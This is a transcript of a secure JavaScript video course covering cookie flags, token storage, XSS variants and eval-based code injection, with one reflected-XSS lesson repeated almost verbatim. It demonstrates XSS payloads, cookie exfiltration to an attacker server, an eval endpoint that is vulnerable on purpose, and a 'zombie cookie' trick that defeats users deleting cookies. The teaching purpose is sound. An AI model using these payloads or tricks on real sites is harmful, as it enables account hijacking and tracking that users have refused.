HTTP only, I think. No, I did not. Okay, so as I told you that you can access cookies in JavaScript. Let's say that you have a cross-site scripting, a CSRF, mostly a cross-site scripting, and someone is able to run arbitrary JavaScript on your website. Well, you don't want them to be able to leak the cookie to a third-party website. For instance, to do an HTTP request to another website with the cookie in it. To actually limit that, we've got HTTP only primitive in cookies. So let me create another cookie here, and it will be HTTP only, HTTP only. And now, if I restart server 1, and we check what are the cookies, we see that we have the cookie HTTP only, that is HTTP only. So if I do document.cookies, well, it's not there. You can't see it. The cookie HTTP equal only is not available from the JavaScript code. However, if I do fetch /print, once again, we don't care about the response, we can see that it has been sent back to the server because we prevented the browser from giving access to this cookie in JavaScript. Okay, let's see what are the other traits. A very important one is secure. Because I'm on localhost, it's complicated to set up, but you want all the cookies to be secure, meaning that they are not allowed to be sent over HTTP, only HTTPS. That is to prevent someone from eavesdropping on the connection and stealing cookies. So in production, cookies must be secure. And once again, it is just a matter of adding secure here, and the browser will know what to do with it. Same site is actually it's actually a new convention. It's not fully implemented by browser, but it's pretty popular. It's pretty powerful. It has 3 potential values. The first one will be strict. So let me start that. Strict, which means it's only for the same domain, and that can override these values here, and the cookies must never be shared with someone else. The second value will be lax, meaning laxist. You can go on the subdomain of the domain but not outside. And known. Known mean, well, no same-site policy at all. And that's actually dangerous because your cookie will be allowed to leak. Okay, so now let's see how we can write cookies from JavaScript. You can actually do that pretty easily by doing document.cookie equal A equals B. And that will not override the cookies, it will just add one here. Let's try to override a cookie. It overrides a cookie. So you can actually add cookies by just setting a value for document.cookie. I know it's not the best JavaScript API we have seen in the world, but that's how it works. Also, you can delete a cookie by doing A equal. And now, if I go on document.cookie, the value of the cookie is empty. And it's somehow deleted, I guess. That's how you manipulate cookies from JavaScript. Now, let's talk about what's a zombie cookie. There are a lot of ways for a user to eventually cancel cookies. One of the easiest one is to actually go there and clear cookies or clean up cookies add-ons, and they might want to do that to prevent being tracked, and they might have Chrome extension or Firefox extensions that prevent cookies to be used for tracking and marketing purpose. I'm not recommending anything, but there is a hack that actually enables a developer to force cookies from the front end. That's what's called zombie cookies. So let's say I take the local storage and I do set item. Sorry. My cookie zombie equals cookie. Now in local storage, I have an entry for my cookie. That's correct. But what I can do is have a script that each time the page is loaded or from time to time actually reset. Okay, I don't know why I can't copy paste. Get item my cookie. Actually reset the cookie from the local storage or the local database or the session storage, because there are many ways of keeping a state on the JavaScript side of an application. Well, you can create those ever cookies or zombie cookies that will actually be impossible to get rid of. Okay, that was a lot. Before I conclude this video, I have to warn you that there are actually legislation about how you can use cookies. For instance, if your website is available in the European Union, you must comply to GDPR. As long as you are an enterprise, a company, and you want to do business in the European Union and your website is available in the European Union, you must comply with GDPR, which means that you can't have cookies that are not needed for the website to work without explicit user agreement. So usually this goes through a banner when you say, hey, this website uses cookies for this purpose, please acknowledge that you accept them. And this must not be just a banner. You're not allowed to set the cookies until they have agreed to that. So make sure that you know the legislative framework before using cookies. They are actually very touchy, sensitive data in the European Union and, as far as I know, in the state of California too. You can always decide not to do business with these areas, but the fines might be huge if you misdo that. So I will not recommend ignoring this legislative part. Thanks so much for watching this video. See you soon in other videos. I hope you enjoyed this one and that now you are able to tell everything you need to know about cookies to anyone. Have a great day and see you soon. Hello and welcome to Secure JavaScript Programming with Vladimir.Turkem. In this video, we will talk about what to do in the front end in a single page application regarding authentication. So I decided to go in a special way today, which is I took an application from GitHub named View Authentication Example, and we will go through the authentication choices and mechanism used by the author and see if we want to keep them, if they are to be replaced and updated. That's a Vue application. I'm aware that a lot of you might be using different frameworks such as Angular, such as React. This actually won't change much. We won't focus on the Vue part. We will highly focus on the concepts linked to authentication and session management. So when we download the application locally, first thing we need to do is, of course, npm install. Luckily, I've already done that, otherwise we'd have been waiting for 3 minutes in this video. And now we need to do npm run serve. So it will build the application and serve it locally. It's blazing fast. That's because I had the application built in cache. Otherwise, it took like a lot of time. So we have a small application that has a login part, a login screen. So if I refresh, I have a first login screen, another login screen. I've got already two login pages, and that's actually confusing because we have two different code paths. Even if we're using the same component, we have two different code paths for login. So let's click on login. Not now. The first thing we can notice is that actually it offered me to add the password to my password manager. I dismissed it quickly and I should not have, but that's actually very interesting. That means that the form has been properly designed for the password manager to recognize that this is a login field. If you don't do that, well, it will push away people who have security best practices in their daily life. So you really want your formulary to be tested against password managers. So in my case, it's LastPass, but there are other ones like Dashlane. And I think it's actually critical that in your Q&A plan, you actually check that the password managers detect the field properly, identify that there is a new login on a new website. So to do that, actually, it has to go in your formulary. When you do the input part, you must make sure that your form has an action field. So in that case, it's not available. Let's inspect that in the console. It will be better. You must make sure that the form has an action. In that case, it's not the case. So it can probably be made better. Then you want to make sure that the username part is uptyped text or email. It will let the password manager and the autocomplete do its magic. Even when created an account, you want the password manager to be able to suggest a password, a strong password. Then you have the field for password, where you must make sure that the type is password. Not only it will hide the password from being seen. Let me do this. You see, now the field is like not hidden as it should. So that's the first thing you do. You want to make sure that the browser knows it has to hide the password from the page, but also it will let the password manager of your user actually know that this is a password field. So when you are on a sign up page, it will detect that you are on a sign up page and suggest a password. When you are on a login page, it will suggest the accounts to the user. I know it's overlooked, but it's actually a critical part. If you want to protect your users, you want to play well with the tools they use to protect their passwords. Okay, now that we have logged in, let's inspect a couple of things. We will inspect the application cookies, and as you can see, there are no cookies for this app. If I go to local storage, I see a lot of things that should not be there, but I see that there is a user token. Let me clear up my local storage. You know the story. When you do web dev, you have a lot of things. So here, once again, my password manager was actually able to detect that I was on a website. So now let's check the application state. And if I go to the local storage, I see that there is a user token. So first of all, there might be sense to put that in the session storage, depending on your authentication flow, because you don't want the user to actually just have to open the website to be authenticated, maybe. Secondly, well, this one is more problematic. For me, the token must be in an HTTP-only cookie. Because in case of XSS, in case of other kind of attacks, this must not be accessible to JavaScript. And one may ask, yeah, but in that case, how do I know if I'm logged in or not? And I know it's not an ideal solution from a dev architecture experience point, but you can have data about the user in the local storage, namely is authenticated username in the local storage or in a cookie that is available through JavaScript. But the token itself should ideally never be accessible by the JavaScript code in the browser. Otherwise, well, in case of cross-site request forgery or XSSs, that are other attacks I detail in that learning track, it can be hijacked, pushed to another domain, or used to tamper with the user. No, sorry, say that again. It can be hijacked and stolen toward another domain. Also, that's the same thing for the other databases in browser. You don't want to have the user token in it. Now, let's open network and log out. When we log out, we see that there is no network access. So when we log out, we see that they just removed the token from the local storage. That's another very bad practice. You must make sure that the token is invalidated in your logout routine. And you need therefore to tell the backend, the server side, that the token is not valid anymore. And to do that, well, you need to do an HTTP request on a logout endpoint. So probably if you go to the logout method, well, instead of just cleaning up the state, you must also have a call to the backend that prevents the login, that tells the backend to invalidate the token and the current session. Another interesting part is that if you use cookies, you will have a simpler life cycle. You will just call /logout and the backend will update your cookies that contain the state of authentication. So you don't have to fetch anything more or to handle the state on your SPA side, because then that's a backend who handle that with the right cookies by removing them, invalidating them, or stuff like that. Another reason why it's actually important to have the token in a cookie rather than in a local storage is that it makes your life easier. So if I remember well, there are some calls here. Yeah, so you've got API call. That is actually a method that have to get the token somewhere. Because it's not in a cookie, to do authentication, you need to actually be able to know, to know what is the token, and you need to fetch it and update your JavaScript code. When you use a cookie, the browser will automatically add the cookie to the request, and that's one extra thing you don't have to think about. And if you don't have to think about token management in your front-end application because it's all cookie driven, well, that's an area where you limit the impact of doing bad stuff and failing at doing security. So for your own safety, for the safety of your website, you should use HTTP only, domain scoped, same site, expiring cookies. That's 10 times more safe than any alternatives. Question is, can this cookie be a JSON Web Token or a JWT? But never say JWT token because it means JSON Web Token and it doesn't mean anything. So can it be a JWT? Well, it doesn't really matter. The content of the JWT is important for the server, but should not really be used in the front end. In that case, you should rather use a JSON Web signature, a JSON Web signed payload, which will actually contain things that are signed, so you know it comes from the from the backend, from the right backend, but it can't be used for authentication. It's just here to hold data that are checkable, but that can't be really weaponized if leaked. But that's only if you need them. One thing that is actually very well done in this application is in the router part. Before loading any view, it checks if the user is authenticated. So in a perfect world, it would be document.cookie.includes blah blah blah. There are libraries for front-end cookie management. Well, that's important for two reasons. For, of course, user experience. You don't want people to be able to see pages that are not allowed to access. And if you want to do a very good UX, you want to redirect them to the first page they wanted after they logged in. I mean, I want to access page A, I need to log in, then I have a login view, and then it brings me immediately to page A, not to the root of the website. That's something you want to do. But it's also important to not let part of your website accessible without checking authentication, because it will just create weird journeys for scanners and start to enable spamming your backend with an unauthenticated request. If /admin require the current user to be an admin, calls to the admin API will burst with authentication failures if you let this being accessed without authentication on the front end. And that will actually make the backend person, whether it's you, whether it's someone else in your team, very, very unhappy. So if I can do a TLDR on front-end authentication, use cookies. And ask the backend person to set the cookies you need about the user authentication. It will reduce the area where you can fail and therefore reduce the security risks on your applications. Thanks so much for watching this video. I hope you enjoyed it, and let's meet together soon again. And for those who are wondering, yeah, I still have a cookie on my desk right now. You know that I really love cookies by now. Bye, have a great day. Hello and welcome to Secure JavaScript Programming with Vladimir.Turkem. I am Vladimir.Turkem, and you can follow me on Twitter at PaulDefet. In this course, in this set of videos, we will talk about XSS, or the cross-site scripting attacks, and other ways of injecting JavaScript code in a JavaScript runtime. We will also see in depth the ways to protect against XSS attacks. So this first video is mostly a set of refreshers, but at the same time, generic principles about XSS attacks, and basically what any JavaScript developer should know about that. I have to warn you, it's not only for the people who only do front end. There's a lot of things related to XSS that happen in the backend, and any web developer should probably level up on this particular case. But let's start with a bit of history, and most of all, Sammy is my hero. That probably doesn't ring a bell, but if you've been around the security internet or MySpace in the late 2000s, you might remember that. It was one of the most world famous XSS attack, and probably one of the biggest and one of the first. So it's a self-replating worm that contained an XSS payload that was executed each time it was printed on someone's MySpace feed. So if you were friend with someone who shared this payload on MySpace, then this will execute with your set of rights on MySpace. So it would do two things: add Sammy as your friend on MySpace, and print on your feed. Sorry about that. Print on your feed the XSS payload and write, but most of all, Sammy is my hero. And it actually took only 20 hours to infect 1 million accounts. It's replicated at a huge speed. It was definitely the first automated pyramid scheme on social media. So how did this happen? Well, it happened through an XSS attack. An XSS happens when a malicious attacker manages to run arbitrary JavaScript code in a given web browser through a web page. Basically, when you can do that, you have access to the whole set of environment of privileges of the area you are running JavaScript in. So let's say you are running JavaScript arbitrarily on the website of any bank. Well, if there are no iframes or ways to limit your reach through the stored state of the application, well, you can act as if you were the legitimate user and just do API calls and be able, for instance, to withdraw any of their money and send that to your own bank account. Basically, it can be very bad because you can impersonate anything and nothing can be trusted anymore. So there are multiple kinds of XSS attacks, and the first one we will see today is reflected XSS. So reflected XSS happens when the payload of the attack is present in an HTTP request to which a response is issued containing the exploited web page. So you will need to trick, if you want to exploit one, you will need to trick the user to click on a certain link, on a certain button to submit a form, and that will actually send the XSS payload to the backend that will respond with a rendered page that will contain the XSS payload on an executable part of the page. They are not persistent, meaning that if you refresh the page, well, if that's on the URL, this will still be available. But if you come back to this page later with the payload not being sent, well, the vulnerability won't be exploited anymore. So reflected XSS are not persistent. They are one-off attacks. Stored XSS, on the other hand, are permanent. So a stored XSS happens when the XSS payload is injected into the storage of the web server, might be a database, and sent in the HTTP responses. So let's say I want to send you a private message through any social media. I could put some XSS code, some JavaScript code there, and maybe the web server will respond with a render web page that will contain the the payload. And stored XSS are persistent. You can come later to the page and it will still be there. Also, there is a special case of stored XSS which is called blind XSS, but we will see that later. DOM-based XSS. So if you build single page applications, you probably think that server-side rendered XSS don't affect you. Well, that's not fully true, because now with more and more single page applications still using server-side rendering technologies such as Next.js or using Pippetter to pre-render stuff, well, rendering things unsafely on the server is back on the table. However, if you only do things in the browser, you might be vulnerable to DOM-based XSS. So this is the kind of XSS that happens when the vulnerability sits in a front-end only code base. So let's say you've got a website and you use the inner HTML property and an object to put something that has been user-defined. You are vulnerable to a DOM-based XSS. Also, the content, the payload of the DOM-based XSS can come from the server through a REST or a GraphQL request. And in that case, well, it can be a stored or a reflected thing. It doesn't matter. The vulnerability lies in the front-end code. So it can be stored back-end side, it can be reflected back-end side, but it can also become reflected front-end side. If I pass parameters, if I trick you to click on a link with parameters that will only be handled by the front-end application, well, I can do a front-end reflected XSS, a DOM-based reflected XSS. But also, it's worth noticing that now web browsers have storage capabilities, whether that's in-memory databases, that might be workers that might have a state, or just storing things on the DOM, or locally in local storage. So all of that means that it's actually possible to do stored XSSs in a browser, meaning that it's really tricky, because the way browsers store things, they can actually store things on a domain or on a session. And if you store things on a domain, even logging off might not clean that storage for the domain. So let's say I go to my bank website, I put something malicious by coding, by going to the developer tools, in the storage of the domain of my bank, and then I log out. And someone uses the same machine, with the same browser, with the same OS user to access their bank account, and they are the same bank as I do. Well, my XSS payload might be exploited, might be triggered then, and I'm probably able to access everything they do. And that can happen too with mailboxes or YouTube accounts or anything. That's why it's extremely important as a personal safety measure that you don't share the same browser as anyone else, or at least not the same browser parameters. So use different sessions for different people. Use public machines in private mode, so this won't be stored in private browsing. So this kind of XSS is actually the newest, and there's little literature on that. Hopefully, through the course of this XSS part, we will go through all of that and much more. Now, one of my favorite XSS, this one is probably the one developers have the hardest time fighting for, and they probably should care the less. It's called self-XSS. A self-XSS happens when the victim is tricked into running the XSS payload themselves. So if you have a Facebook account, just open the DevTools on Facebook and you will see warnings about self-XSSs. That happens through social engineering, and it can really work on certain people who are not really familiar with the internet, and you tell them, hey, run that, and the colors of your Facebook account will change. Run that, and you will have access to secret Google, whatever that means. And it's actually extremely easy to trick people into opening the console and copy paste a JavaScript chunk they have no idea about. So it only happens through social engineering, and the best you can do as a developer is to put warnings in the console of your website saying never copy paste anything here, and Facebook is actually a great example for that. Watch the next videos to learn more. We will go in depth into most of that and much more, because right now this intro was only about XSS, but there are other ways of executing arbitrary JavaScript on a JavaScript environment. Hint, eval. Also, the methods to protect against XSS in the browser are actually extremely more and more complex. So if you don't know about CORS, about content security policy, or about the new protection on the block that's named trusted types, that's an extremely exciting Google project, you really want to check the next videos of that course. Thanks so much for your attention. See you soon and take care of yourself until we meet again. Hello and welcome to Secure JavaScript Programming with Vladimir the Turkan. In this video we will talk about reflected or reflective XSS. So let's start with examples. I've got this website that you can use when you want people to subscribe to your newsletter. So for instance, if you want to push your friend John to subscribe to it, you will just send them the link with John as a query parameters, and it will say, hello John, do subscribe to our newsletter, enter your name, enter your email. So John would say John Doe, and they would put their own email address here. At example.com, and then hello John Doe, we have just sent you a confirmation email at johndoe@example.com, and that's it. Well, this website is vulnerable to reflective XSS, and we will see two ways of achieving reflective XSS attacks. In this case, we know that this part is dynamic. A hacker would first try to see if these kind of things will be escaped. So we will use some very old HTML tags. I don't know if anyone remembers using the B tag, which actually bold the text. And you don't rush into throwing script when you look up for XSS. You start with that so you are sure that you have a sync. Also, something I usually do is I might happen to escape this in a URI component. Why is that? Because some frameworks will actually not accept the slash at the end as a valid thing. It will see that as something in the path maybe. So let's just do that, and once again it's bold. If we inspect the element in the console, it has a bold tag around. So now we can go and do even further and have what everyone do when they want to do an XSS: script alert hello and /script. Let's hope I wrote that properly, and we will put that in here, and voila, we've got an alert that has been triggered, and that means that we are able to run arbitrary JavaScript code on this domain. So what would be an ideal scenario for such attack? Well, as I told you, this is a social link. So you would actually trick someone into clicking into a crafted link, maybe behind a URL shortener so they don't see all the things, maybe with actually the encoded part here so they don't see that there is a blatant XSS in the URL they're clicking on, and you could trick them into clicking, which is okay in general, but if that's on a website where they already have a cookie available because it's a wider application and they might already have a cookie in it, you can arbitrarily run anything. So let's say you've got an invitational link for a banking stuff. You would craft a link, and if the person already have an account in the bank and is connected with their browser, you can do pretty much what you want with their bank account. That's why it's called reflected XSS also, because you have to craft a request and actually trick people into clicking on it. Here we've got the call and we've got the rendering on the page immediately. There is nothing coming from database. That's what we will see in the next video of this course. So you want to trick people into doing something, and the XSS attack will come directly inside the response. You want them to click on your link, or you want them to fill a form where you might have hidden some parts that are vulnerable to XSS. So here I also have a vulnerable form. Let's go easy and do like that at script.com. Okay, too bad. Let's use the encoded value. I'm not sure this one will work. Let's find that together. Up. It has an error base. Okay, so the browser validation doesn't let me to XSS in this part. me@me.me. But here we have another XSS here at this point. If we inspect that, we exactly have the same one. That's another kind of reflected XSS, but this one through a form. The page is rendered with things that comes from the request in the body. So when you render a web page with something coming from the body, you want to make sure that everything is escaped. So you have two ways of actually fighting XSS. You escape things that you pass to the renderer. So for instance, you can use a module that does HTML escape, but this one is pretty old, but I let you check on my video on how to choose the right module, how to find the right module to HTML escape. But the best way is actually to use the templating engine. So for instance, in EJS, there is a way to actually tell the templating engine that you want it to escape the values. So if I go back here, if I reload, you can see that this is escaped. So if we go to the EJS documentation, we see that it has multiple ways of accepting something, and the one I recommend is with %equal. And whatever templating engine you use, you want to use the value that is HTML escaped. That's how you protect against a reflected XSS. Thanks so much for watching this video. I hope I help you understand what are reflected XSS. See you soon in another video, maybe the next one, which is about stored XSS. Hello and welcome to Secure JavaScript Programming with Vladimir de Turckheim. In this video, we will talk about reflected or reflective XSS. So let's start with examples. I've got this website that you can use when you want people to subscribe to your newsletter. So for instance, if you want to push your friend John to subscribe to it, you will just send them the link with John as a query parameters, and it would say, hello John, do subscribe to our newsletter, enter your name, enter your email. So John would say John Doe, and they would put their own email address here at example.com. And then, hello John Doe, we have just sent you a confirmation email at johndoe@example.com. And that's it. Well, this website is vulnerable to reflective XSS. And we will see two ways of achieving reflective XSS attacks. In this case, we know that this part is dynamic. A hacker would first try to see if these kind of things will be escaped. So we will use some very old HTML tags. I don't know if anyone remembers using the B tag, which actually bold the text. And you don't rush into throwing script when you look up for XSS. You start with that so you are sure that you have a sync. Also, something I usually do is I might happen to escape this in an URI component. Why is that? Because some frameworks will actually not accept the slash at the end as a valid thing. It will see that as something in the path maybe. So let's just do that, and once again it's bold. If we inspect the element in the console, it has a bold tag around. So now we can go and do even further and have what everyone do when they want to do an XSS: script alert hello and /script. Let's hope I wrote that properly, and we will put that in here, and voila, we've got an alert that has been triggered, and that means that we are able to run arbitrary JavaScript code on this domain. So what would be an ideal scenario for such attack? Well, as I told you, this is a social link. So you would actually trick someone into clicking into a crafted link, maybe behind a URL shortener so they don't see all the things, maybe with actually the encoded part here so they don't see that there is a blatant XSS in the URL they're clicking on, and you could trick them into clicking, which is okay in general. But if that's on a website where they already have a cookie available because it's a wider application and they might already have a cookie in it, you can arbitrarily run anything. So let's say you've got an invitational link for a banking stuff. You would craft a link, and if the person already have an account in the bank and is connected with their browser, you can do pretty much what you want with their bank account. That's why it's called reflected XSS also, because you have to craft a request and actually trick people into clicking on it. Here we've got the call and we've got the rendering on the page immediately. There is nothing coming from database. That's what we will see in the next video of this course. So you want to trick people into doing something, and the XSS attack will come directly inside the response. You want them to click on your link, or you want them to fill a form where you might have hidden some parts that are vulnerable to XSS. So here I also have a vulnerable form. Let's go easy and do like that at script.com. Okay, too bad. Let's use the encoded value. I'm not sure this one will work. Let's find that together. Up. It has an error. Okay, so the browser validation doesn't let me to XSS in this part. Me at me.me. But here we have another XSS here at this point. If we inspect that, we exactly have the same one. That's another kind of reflected XSS, but this one through a form. The page is rendered with things that comes from the request in the body. So when you render a web page with something coming from the body, you want to make sure that everything is escaped. So you have two ways of actually fighting XSS. You escape things that you pass to the renderer. So for instance, you can use a module that does HTML escape, but this one is pretty old, but I let you check on my video on how to choose the right module, how to find the right module to HTML escape. But the best way is actually to use the templating engine. So for instance, in EJS, there is a way to actually tell the templating engine that you want it to escape the values. So if I go back here, if I reload, you can see that this is escaped. So if we go to the EJS documentation, we see that it has multiple ways of accepting something, and the one I recommend is with %equal. And whatever templating engine you use, you want to use the value that is HTML escaped. That's how you protect against a reflected XSS. Thanks so much for watching this video. I hope I help you understand what are reflected XSS. See you soon in another video, maybe the next one, which is about stored XSS. Hello and welcome to Secure JavaScript Programming with Vladimir.Turkem. In this video, we will talk about stored and blind XSS attacks. So here we've got a simple form. If you just watch the reflected XSS video, you probably already know it. It's a simple form to subscribe to a newsletter or a website. It's not really important. We have someone named John Doe, and they tell also their email address. Okay, we tell them a confirmation message that they will get an email. Also, we have a subscription endpoint that lists all the people who have subscribed. So here we've got John Doe and their email address. Of course, this endpoint should probably be behind authentication, but that's not the very interesting part right now. What's interesting is that comes from a database. I can reload, and unlike the previous video, the malicious payload, the content of the page is not coming from the request. So if I subscribed another user with an XSS attack in it, there is no XSS here because there is no reflective XSS in this page anymore. But if I go there, here I've got the code executing, because here in the table, yes, I'm the last person on earth that uses HTML table, there is a script that has been injected. And I can reload this page as much as I want. This is staying. So that's what's called a stored XSS. It has been placed there, and everyone who loads this page will get the attack. Meaning that unlike the reflected XSS that's usually targeting a single person at once, this attack can target everyone who has access to this page. So let me restart the app to do that. So now I cleared the database, and now let's say I want to do img src equals http:// .o/ this, and now I close the image. I could, using a script, have the URL of the image contain the cookies. So instead of doing img src, I would create an image part, and I will update its URL later with a script, always in this field, that will actually contain the cookies. So it's a complicated way of doing, I want to do this. But because I put that on an image URL, the browser will do a GET request to that URL, and my remote server is a malicious server that I have crafted to log every incoming request. So I am able, here, I just have this, but now it actually logs the content of the cookies. So I have no cookies in this app, and that's probably a failure for me, but this logs the content of the cookies, and I could do an image request to a remote server, a CSS request to a remote server, which are not actually limited by cross-origin resource sharing policy by default, and leak the cookie later. So when this happens and the attacker is aware, knows in which page it actually will render, if this page subscribe all is world readable, or at least readable by the attacker, this is what's called a stored XSS, because it's just stored and the attacker knows where this is going. When the attacker injects a malicious payload, and that they don't know where it will render, they just inject as many malicious payloads as they can in the database and hope it will render. That's what's called a blind XSS. That means that it's a stored XSS, but you don't know what the result will be, and you have to monitor your remote server to know if that worked or not. This has been created by my good friend Adam Baldwin as a concept. That's pretty cool. So, how to protect against stored XSS? Well, the first layer of defense is once again to escape everything you render in the template. That's actually very important. The second layer of defense is actually prevent writing weird stuff into your database. So either you want a web application firewall to detect the attempts, either you want also to sanitize with sanitizing libraries everything that gets into your app. Sadly, because browsers are very permissive on what they execute, a lot of sanitization is limited in what it can actually really achieve. So it will not be a silver bullet. The real way is actually to use either a single page application, but in that case you might be vulnerable to DOM-based XSS, and I don't want to spoil the next video. Thanks so much for watching this short video about stored and blind XSS. See you soon. Hello and welcome to Secure JavaScript Programming with Vladimir.Turkem. In this video, we will talk about DOM-based XSS. So you remember about stored XSS, which are XSS that are stored in the database server side or something like that. You remember about reflective XSSs, that are XSSs rendered by the backend, by the server on server side, based on the incoming request. Well, how do you call an XSS when the whole vulnerability can lie in the front end, in the web application, in the browser? Well, it's called the DOM-based XSS. So here we've got a simple HTML page that loads a script, says hello you, and when you click on the button named click me to open the Pandora box, that's definitely not suspicious. It will call a script that fetch user. So here in that case, it's here to simulate a call to the backend application, to a backend API. That could be an endpoint get me, or that could be any endpoint that return data that is actually available from the backend. And that could be reflective or stored from the front-end website, from the front-end application point of view. The source of the data does not really matter. So it could be a reflective DOM-based XSS for the case when you fetch it from actually the backend. So when we get the item, here it's just a promise that resolves on John Doe, we change the value inner HTML of the element hello. That's actually where the vulnerability lies, but let's not spoil too much. So if I click on open the Pandora box, it writes hello John Doe. Let's try to put an XSS payload here. We reload the page, we click and nothing happens. Okay, that's weird. If we check the DOM with inspect, we can easily see that there is a rendered script tag, but it's not executed. That's because the browser does not execute script tags that are added with inner HTML. So I haven't demonstrated yet that inner HTML is vulnerable. Okay, let's try something else. Let's do emg src equals and now /image. Okay, let's just do an auto closing thing. I started doing HTML in the early 2000s. But now an error will do alert hello. And if this fails, I actually have a plan B. Okay, so now, okay, let's reload the page. And when we do that, we've got an XSS. That's because the browser is now trying to render the image. So this element is a broken image. Because it's broken, because its source, its URL doesn't work, if we check the network tab, you see that there is a 404 call that has happened, and that triggers the call to the onError method on the image tag. So the onError element, the onError part, is actually an XSS. Images are really powerful for that, because they have fewer browser limitations than scripts. Okay, so let's recapitulate. When we use the inner HTML property on an element, we might be vulnerable to DOM-based XSS, because we are able to inject new nodes in the web page, and we have seen that it is possible to make them executable. So now the question is, where does fetch user come from? Where does the user come from? It can come from the backend, from an API. In the case you are in a Jamstack, for instance. In that case, well, you would probably want to not trust what comes from your own backend. But it can be worse. Let's go to the browser and imagine that we've got local storage.set item. Oh, let's do it even better. Local storage.set item, first name, and here we would put our XSS payload. And now, actually, the XSS payload will not be coming from the backend, but from the local storage. What does that mean? Here we've got the attack, and if we check the application tab, we can see in the local storage that the XSS payload is here. That means that even the storage of the application in browser might contain that, might contain an XSS payload. In that case, well, on a shared computer, that's extremely problematic, because as a hacker, I just need to go on a shared computer and make sure that I have polluted the local storage of multiple websites, including banking websites, with XSS payloads. And if the base code, the application code, is vulnerable to rendering bad things coming from the local storage, well, the next user is doomed. And I am actually stealing data from people. So even data that you stored yourself in the local storage is not to be trusted. Never use inner HTML or other method that can be XSS vulnerable. You're opening too much of a big sink. Even cookies can't be rendered in a web page. Okay, so that's a bit scary because as we saw, even attributes on some elements can be used to inject XSS. Because in the previous videos, I just showed injecting new script items. But let's say you've got an image field where the value is dynamic, where the XSS would sit here, like you would have here something like URL coming from the user. Well, the user could use a payload that injects the fake URL and the on-error thing. So if you have a service that accepts arbitrary URL, you're doomed. If you use the local state to check the query string or the URL parameters, well, you're doomed. Anything that your framework provides you as a string value, even in a front-end web page, should not be trusted. So here I've shown the low-level stuff, and nowadays less and less people do their own rendering. They use libraries or frameworks. In React, by default, the only vulnerable parts are HTML4 and dangerously set inner HTML. And there is a very good documentation on that. So basically, as a rule of thumb, never use dangerously set inner HTML. It has a rightfully defined name. However, it's worth noticing that in some versions of React, I'm not sure which ones, server-side rendering React, I mean in all versions actually, server-side rendering React by default is vulnerable to XSS. So you need to make sure, as if you were building a backend application in that case, that you have escaped things. Vue.js is less explicit. Of course, the method is named vHTML, and there's a warning telling you to use that in a frame. And additionally, allowing users to write their own view templates brings similar dangers. As a rule of good AGN, coding AGN, don't render HTML you did not write. I understand that you need to do fancy rendering of things. In that case, use meta languages like Fancy Pants Editor or stuff like that. But never put yourself in a situation where a user can render HTML in the browser. That will be polluted and exploited. So let's recapitulate. Never use inner HTML. Don't trust inputs, whether they are coming from the network or... Where is it complaining? Yes. Sorry about that. It's a security measure from my AD. Never trust anything, even if that's coming from your own backend, or if that's coming from your local storage. That's not to be trusted, because your local storage can actually be polluted, whether it's local storage, session store, the databases, or even the cookies. Last but not least, if you're using a high-level framework, make sure you checked which part of the framework are vulnerable to XSS. Easily enough, just Google React XSS. Protecting XSS in React applications, cross-site scripting in React web apps. All of that, when you use a high-level framework, you need to check the documentation. By default, you are safe, but make sure you are. I hope I did not scare you too much in this video. Thanks so much for watching it. XSS are still very present, and despite a lot of recent claims, React, Vue, Angular did not remove XSS. Removing XSS for real happens with using other things such as CSP headers or trusted types. And that's why you probably want to check the next videos of that course. Thanks so much for watching this video. Have a great day. Hello and welcome to Secure JavaScript Programming with Vladimir de Turkheim. So we have seen stuff about injecting nodes in a web page. In the two previous videos of this course, which were about reflective, DOM-based, and stored/persistent XSS, so not the two, but the three previous videos of that course, we've been seeing how it is possible through nodes injection in an HTML page to reach a state of XSS. XSS historically is cross-site scripting, which used to be mostly about loading an external script from a remote location. That's why it's called that way. And it evolved, and now its definition is more running arbitrary JavaScript in an application, in a browser. Well, there is actually a greater concept, a bigger concept than XSS, that's named remote code injection. Remote code injections happen when you're able to run arbitrary code on a machine that's not yours. It's easy to understand that XSS are actually a subcase based on HTML executable things. XSSs are a subcase of RCEs, remote code execution. Well, in JavaScript, there are other ways to obtain remote code execution. Actually, this will not be linked to an HTML page or any browser capability. We won't inject malformed image today, but we will actually be executing arbitrary code within the JavaScript virtual machine. So this will be valid for server-side JavaScript and browser-side JavaScript. The question is, are there ways to turn an arbitrary string into an executable piece of code in JavaScript? Well, one easy way is to have the browser or Node execute it directly as a script, but we already said that changing the DOM was out of the game this time. So let's build a simple way of exploiting a SCE, for instance, in an Express application. So I will create a new app with index.js, and I will call use strict. Of course, create a new app, and in this app we will create the stupidest endpoint in the world. Because what we do is eval rec.query.run, and we do res.end OK /n app.listen 8080. Let's run this piece of code. Let's open a terminal and let's do curl http / and how did I name it? Run equals console log 10. Okay, because I forgot to put the port. Here you can see that 10 has been logged, that the value we passed as run has been executed. This is like a very dummy piece of code that calls the eval JavaScript method within the controller. And eval is an interesting method because you can pass any string to it, and that will be executed in the concept of JavaScript code. Well, so if I run this script, it will print hello world. Usually you don't use eval yourself, but there might be some libraries you use who use it, especially in template rendering. Eval is actually pretty popular when you need to run generated script within an application because it's pretty fast in terms of performances. That's why actually a lot of libraries that need to generate code quickly use it under the hood. Eval is one of the worst methods you can use in your code, and it will actually make sense for you to run right now a linter to prevent the use of eval. Eval has something interesting that if you do that, well, the code is executed in the context of the current script, meaning that if you do that, there will be a side effect. You can access as if you were writing code right here without eval. You have access to the whole scope. The second known way of building arbitrary script in JavaScript is actually using the function constructor. I don't know if you were aware, but there is actually a constructor for function that takes the following signature. First, the parameters as strings, and then the body of the function. So let's do return a plus b. And if I do console.log.f56, it will actually log not a number because I put a period. It will log 11. This also enables to build arbitrary code from strings, and when manipulating that eval or f or new functions with code that is defined by the end user, well, you are in trouble. Does it have access to the scope? Does it have access to the context where it has been defined? Let's try it. I know the answer, but you can see it doesn't. So eval is much more dangerous than using new function, because eval actually knows about the global context and function does not. If I log the function itself, actually, that's toString. If I log the code of the function, it generates an anonymous function and concatenates the right things at the right place. Now I'm wondering a lot of things. Eval and new functions are dangerous and should never be used. And if you have to use it, don't use that with concatenated strings. And if you have to use it still, don't use that with concatenated string with anything coming from the end user. It's borderline impossible to escape inputs safely with that. So make sure that it is not running. In Node.js, there is even a way to globally disable it, and soon there will be a hook being called so you can prevent calling it. There are two other ways of running arbitrary scripts in Node.js and the browser. One for the Node.js, one for the browser. For the Node.js, there is actually a module named VM. This module is very handy when you want to run arbitrary code. Run in context. If I do that, what will happen? Well, it did not log anything because it did not bind the console. This module actually allows you to choose what are the global for the execution of the script. However, the documentation of this module states it. Really, it's not a security VM. Everything you run here might have side effects on the rest of the 